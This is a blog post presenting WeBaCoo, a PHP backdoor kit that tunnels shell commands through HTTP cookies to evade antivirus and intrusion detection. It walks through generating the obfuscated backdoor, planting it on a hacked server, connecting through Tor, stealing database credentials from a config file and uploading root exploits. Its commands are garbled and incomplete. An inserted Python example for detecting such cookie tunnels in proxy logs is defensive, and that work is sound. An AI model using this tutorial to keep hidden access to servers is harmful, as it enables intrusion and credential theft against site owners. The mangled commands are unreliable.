Sunday, September 22, 2013


WeBaCoo (Web Backdoor Cookie) is a web backdoor script-kit that provides a terminal connection over HTTP between the client and the web server. It is an exploitation tool for maintaining access to a compromised (hacked) web server.
WeBaCoo was designed to operate under the radar of modern, up-to-date AV, NIDS, IPS, network firewalls and application firewalls, providing a stealthy mechanism for executing commands on the compromised server. The obfuscated file carries its communication in the HTTP Cookie header, in both the requests to and the responses from the web server.
WeBaCoo provides a way to generate the code for the PHP backdoor using predefined payloads. It also offers a “terminal” mode in which the user can establish a remote connection to the server and execute the desired commands with the privileges of the web service.
In many cases this tool is used when the server does not have Netcat available.
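From the detection side, as an added example that is not part of the original post or of the WeBaCoo project: this Python scans a constructed proxy log for the traffic pattern described above, a command hidden in a request cookie and its output returned inside a response cookie wrapped in a delimiter such as the “TTT” that appears in the usage list below. The log layout, cookie contents and file names are assumptions made for the sample, as is the assumption that the wrapped blob is base64; the delimiter is recovered with a backreference rather than hard-coded, so it also catches a changed delimiter.

```python
import base64
import re

# Constructed sample log (not from the original post). One HTTP exchange per
# line, tab-separated: request line, request Cookie header, response Set-Cookie.
SAMPLE_LOG = """\
GET /index.php\tCookie: session=abc123; lang=en\tSet-Cookie: session=abc123
GET /images/logo.php\tCookie: cm=aWQ=; cn=Test-Cookie; cp=TTT\tSet-Cookie: Test-Cookie=TTTdWlkPTMzKHd3dy1kYXRhKQo=TTT
GET /about.html\tCookie: -\tSet-Cookie: -
"""

# Cookie value shaped <delim><base64><delim>: the delimiter is a short
# alphabetic token repeated at both ends (the post shows "TTT", and -d can
# change it), so a backreference recovers it instead of hard-coding one.
WRAPPED = re.compile(
    r"([A-Za-z0-9_-]+)=([A-Za-z]{2,8})([A-Za-z0-9+/]{4,}={0,2})\2(?=;|\s|$)")

def _b64_text(value):
    """Return the decoded text if value is base64 of printable text, else None."""
    if len(value) % 4 or not re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", value):
        return None
    try:
        text = base64.b64decode(value, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None
    return text if text.strip() and text.strip().isprintable() else None

def find_cookie_tunnels(log_text):
    """Flag exchanges whose Set-Cookie returns a delimiter-wrapped blob that
    decodes to text (assumption: command output travels base64-encoded) and
    list the request cookies that decode to text, the likely command."""
    hits = []
    for line in log_text.splitlines():
        request, cookie_hdr, setcookie_hdr = line.split("\t")
        m = WRAPPED.search(setcookie_hdr)
        output = _b64_text(m.group(3)) if m else None
        if output is None:
            continue
        raw = cookie_hdr.split(":", 1)[1].split(";")
        cookies = dict(c.strip().split("=", 1) for c in raw if "=" in c)
        hits.append({
            "request": request, "cookie_name": m.group(1), "delimiter": m.group(2),
            # A request cookie that merely repeats the delimiter corroborates
            # the pairing (the constructed sample sends it as cp=TTT).
            "delimiter_echoed": m.group(2) in cookies.values(),
            "commands": [t for t in map(_b64_text, cookies.values()) if t],
            "output": output,
        })
    return hits
```

Run over the sample, only the second exchange is reported, with the recovered delimiter, the decoded command and the decoded output ready for triage.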
git clone git :/ / / anestisb / WeBaCoo.git
. /
1) Create obfuscated backdoor ‘backdoor.php’ with default settings:
. / backdoor.php
2) Create the de-obfuscated backdoor ‘raw-backdoor.php’ using the “transit” function:
. / raw-backdoor.php-f 4-r
3) Set “terminal” connection to the remote host using the default settings:
. /
4) Set up a “terminal” connection to the remote host, configuring some arguments:
. / “Test-Cookie”-d “TTT”
5) Set up a “terminal” connection to the remote host via an HTTP proxy:
. /
6) Set up a “terminal” connection to the remote host via an HTTP proxy with basic authentication:
. / user: password:
7) Set up a “terminal” connection to the remote host via Tor, logging the activity:
. / tor-l webacoo_log.txt
Now, with the tool installed and the commands known, we create the backdoor in order to obtain a connection to the web server from the console.
For this case I have a compromised (hacked) server to which I will upload the backdoor created with the following command:
. / backdoor.php
The backdoor.php is created and placed in the WeBaCoo folder; then upload the file to the (hacked) server and connect to it with the following command:
The connection to the server works perfectly and is very fast.
Simple commands:
In this case we type “load” to list the available modules, which are:
1) MySQL-CLI: MySQL Command Line Module:
mysql-cli (ex. ‘mysql-cli admin pass’)
2) PSQL-CLI: Postgres Command Line Module:
psql-cli (ex. ‘testdb psql-cli root pass’)
3) Upload: File Upload Module:
upload (ex. ‘upload exploit.c /tmp/’)
4) Download: File Download Module:
download (ex. ‘download config.php’)
5) Stealth: Stealth Enhance Module
stealth (ex. ‘stealth /var/www/html’)
These commands are easy to use; here is a brief demonstration with the MySQL-CLI module, connecting to the server’s database.
1) Download the configuration file:
download configuration.php
2) Open the configuration.php file, copy the MySQL user and password, and type the command:
mysql-cli db_user db_password
3) The tool connects to MySQL; now we simply type show databases; to see all the databases.
Similarly, the other commands can be used to upload a local root exploit or to download any file from the server.
Now, with this tool, you no longer need Netcat on the web server, nor a Netcat back-connection (which often fails), in order to connect to a web server.
I hope you find it useful.
